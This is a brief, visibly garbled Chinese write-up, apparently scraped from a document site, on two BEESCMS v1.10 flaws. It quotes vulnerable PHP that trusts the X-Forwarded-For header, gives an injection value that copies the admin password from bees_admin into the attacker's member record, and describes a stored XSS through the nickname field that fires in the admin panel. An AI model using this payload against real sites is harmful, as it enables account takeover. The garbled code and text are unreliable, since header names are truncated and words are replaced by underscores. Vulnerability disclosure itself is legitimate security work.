文本内容:
BEESCMS v110getip注射漏洞与XSS脚本安全电脑资料最近工作了,比较忙,所以很少文章,介绍BEES企业网站系统(以下称BEES)是一个基于PHP+Mysql架构的企业网站管理系统BEES采用模块化方式开发,功能强大灵活易于扩展,并且完全开放源代码,多种语言分站,为企业网站建设和外贸提供解决方案漏洞1fun.php functionget_ip{if!empty$_SERVER[_CLIENT_IP]{return$_SERVER[_CLIENT_IP];}elseif!empty$_SERVER[_X_FORWARDED_FOR]//这里可以伪造{return$_SERVER[_X_FORWARDED_FOR];}else{return$_SERVER[REMOTE_ADDR];}}reg.php$ip=get_ip;$sql=update.DB_PRE.member setmember_time={$addtime},member_ip={$ip}where id={$last_id};简单构造一下x_forwarded_for:
127.
0.
0.1,member____=select admin_password frombees_admin,member_phone=ziyi,就把管理员密码射到你___号上了,过会发EXP,漏洞2XSS同样是在页面,昵称没有过滤就入库,导致可以可以XSS在昵称一栏填写,成功后,当管理员在后台打开会员管理就会触发我们的XSS代码,如图模板,内容仅供参考 。